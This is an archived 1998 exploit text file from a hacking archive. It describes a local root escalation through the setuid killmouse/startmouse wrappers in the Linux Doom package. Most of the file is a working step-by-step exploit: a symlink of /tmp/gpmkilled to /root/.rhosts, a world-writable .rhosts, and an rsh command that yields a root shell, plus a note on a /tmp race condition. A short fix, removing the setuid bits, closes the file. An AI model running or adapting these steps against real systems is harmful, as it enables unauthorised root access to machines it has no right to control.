home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Hacking & Misc
/
bundle of exploits.sit
/
bundle of exploits
/
gpm-exploit.txt
< prev
next >
Wrap
Text File
|
1998-07-17
|
2KB
|
70 lines
System:
Probably Linux specific. Slackware 3.0 (installs Linux 1.2.13) which
have gpm utility and/or the Doom package installed are vulnerable.
Other distributions might be too.
Impact:
Local users can acquire root status.
Background:
The problem is the killmouse/startmouse command that is part of Doom
package on Linux systems. It is actually a C-wrapper that runs two
scripts (killmouse.sh/startmouse.sh). It runs suid root.
/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi
/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi
Problem:
I would try to describe the problem but I can't stop laughing.
Exploit:
This can be exploited in a few similar ways. Here's just one. Let's
assume the gpm utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:
$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse
ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms
Fine, it's running. Now we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:
$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms
$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts
$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#
Bingo. On some systems gpm might not be started in /etc/rc.d/rc.local
so the startmouse script will fail. But gpm might be running already.
If neither of these conditions are met, note that startmouse.sh creates
/tmp/gpmscript and runs it in a shell. There's a window of time between
creating the script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.
Solution:
Remove setuid bits of killmouse/startmouse. Better yet - nuke them.
While your at it, nuke Doom too - it's a stupid game anyway :-)